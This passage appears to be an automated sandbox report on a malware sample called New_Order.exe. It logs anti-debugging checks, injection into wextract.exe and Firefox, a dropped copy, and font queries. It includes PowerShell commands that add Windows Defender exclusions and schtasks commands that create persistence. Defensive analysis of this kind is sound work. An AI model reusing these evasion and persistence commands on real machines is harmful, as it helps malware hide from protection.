            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012825E0 mov eax, dword ptr fs:[00000030h]10_2_012825E0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AE5E7 mov eax, dword ptr fs:[00000030h]10_2_012AE5E7
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE5CF mov eax, dword ptr fs:[00000030h]10_2_012BE5CF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE5CF mov eax, dword ptr fs:[00000030h]10_2_012BE5CF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012865D0 mov eax, dword ptr fs:[00000030h]10_2_012865D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA5D0 mov eax, dword ptr fs:[00000030h]10_2_012BA5D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA5D0 mov eax, dword ptr fs:[00000030h]10_2_012BA5D0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127C427 mov eax, dword ptr fs:[00000030h]10_2_0127C427
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E420 mov eax, dword ptr fs:[00000030h]10_2_0127E420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E420 mov eax, dword ptr fs:[00000030h]10_2_0127E420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127E420 mov eax, dword ptr fs:[00000030h]10_2_0127E420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01306420 mov eax, dword ptr fs:[00000030h]10_2_01306420
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8402 mov eax, dword ptr fs:[00000030h]10_2_012B8402
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8402 mov eax, dword ptr fs:[00000030h]10_2_012B8402
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8402 mov eax, dword ptr fs:[00000030h]10_2_012B8402
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130C460 mov ecx, dword ptr fs:[00000030h]10_2_0130C460
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AA470 mov eax, dword ptr fs:[00000030h]10_2_012AA470
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AA470 mov eax, dword ptr fs:[00000030h]10_2_012AA470
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012AA470 mov eax, dword ptr fs:[00000030h]10_2_012AA470
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A456 mov eax, dword ptr fs:[00000030h]10_2_0133A456
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BE443 mov eax, dword ptr fs:[00000030h]10_2_012BE443
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A245A mov eax, dword ptr fs:[00000030h]10_2_012A245A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0127645D mov eax, dword ptr fs:[00000030h]10_2_0127645D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130A4B0 mov eax, dword ptr fs:[00000030h]10_2_0130A4B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012864AB mov eax, dword ptr fs:[00000030h]10_2_012864AB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B44B0 mov ecx, dword ptr fs:[00000030h]10_2_012B44B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0133A49A mov eax, dword ptr fs:[00000030h]10_2_0133A49A
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012804E5 mov ecx, dword ptr fs:[00000030h]10_2_012804E5
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC720 mov eax, dword ptr fs:[00000030h]10_2_012BC720
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC720 mov eax, dword ptr fs:[00000030h]10_2_012BC720
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B273C mov eax, dword ptr fs:[00000030h]10_2_012B273C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B273C mov ecx, dword ptr fs:[00000030h]10_2_012B273C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B273C mov eax, dword ptr fs:[00000030h]10_2_012B273C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FC730 mov eax, dword ptr fs:[00000030h]10_2_012FC730
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BC700 mov eax, dword ptr fs:[00000030h]10_2_012BC700
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280710 mov eax, dword ptr fs:[00000030h]10_2_01280710
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B0710 mov eax, dword ptr fs:[00000030h]10_2_012B0710
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288770 mov eax, dword ptr fs:[00000030h]10_2_01288770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290770 mov eax, dword ptr fs:[00000030h]10_2_01290770
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01304755 mov eax, dword ptr fs:[00000030h]10_2_01304755
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B674D mov esi, dword ptr fs:[00000030h]10_2_012B674D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B674D mov eax, dword ptr fs:[00000030h]10_2_012B674D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B674D mov eax, dword ptr fs:[00000030h]10_2_012B674D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E75D mov eax, dword ptr fs:[00000030h]10_2_0130E75D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280750 mov eax, dword ptr fs:[00000030h]10_2_01280750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2750 mov eax, dword ptr fs:[00000030h]10_2_012C2750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2750 mov eax, dword ptr fs:[00000030h]10_2_012C2750
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012807AF mov eax, dword ptr fs:[00000030h]10_2_012807AF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013347A0 mov eax, dword ptr fs:[00000030h]10_2_013347A0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132678E mov eax, dword ptr fs:[00000030h]10_2_0132678E
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A27ED mov eax, dword ptr fs:[00000030h]10_2_012A27ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A27ED mov eax, dword ptr fs:[00000030h]10_2_012A27ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A27ED mov eax, dword ptr fs:[00000030h]10_2_012A27ED
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130E7E1 mov eax, dword ptr fs:[00000030h]10_2_0130E7E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012847FB mov eax, dword ptr fs:[00000030h]10_2_012847FB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012847FB mov eax, dword ptr fs:[00000030h]10_2_012847FB
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128C7C0 mov eax, dword ptr fs:[00000030h]10_2_0128C7C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_013007C3 mov eax, dword ptr fs:[00000030h]10_2_013007C3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128262C mov eax, dword ptr fs:[00000030h]10_2_0128262C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B6620 mov eax, dword ptr fs:[00000030h]10_2_012B6620
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8620 mov eax, dword ptr fs:[00000030h]10_2_012B8620
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129E627 mov eax, dword ptr fs:[00000030h]10_2_0129E627
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129260B mov eax, dword ptr fs:[00000030h]10_2_0129260B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FE609 mov eax, dword ptr fs:[00000030h]10_2_012FE609
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2619 mov eax, dword ptr fs:[00000030h]10_2_012C2619
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BA660 mov eax, dword ptr fs:[00000030h]10_2_012BA660
            Source: C:\Users\user\Desktop\New_Order.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\wextract.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\New_Order.exe Code function: 10_2_004171A3 LdrLoadDll, 10_2_004171A3
            Source: C:\Users\user\Desktop\New_Order.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\New_Order.exe Section loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\New_Order.exe Section loaded: unknown target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Section loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exe Section loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: read write
            Source: C:\Windows\SysWOW64\wextract.exe Section loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\wextract.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe Section loaded: unknown target: C:\Users\user\AppData\Roaming\QjSljS.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe Section loaded: unknown target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000
            Source: C:\Users\user\Desktop\New_Order.exe Memory written: C:\Users\user\Desktop\New_Order.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Memory written: C:\Users\user\AppData\Roaming\QjSljS.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\wextract.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\wextract.exe Thread APC queued: target process: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
            Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
            Source: C:\Users\user\Desktop\New_Order.exe Process created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Process created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe Process created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: C:\Windows\SysWOW64\wextract.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Users\user\Desktop\New_Order.exe VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
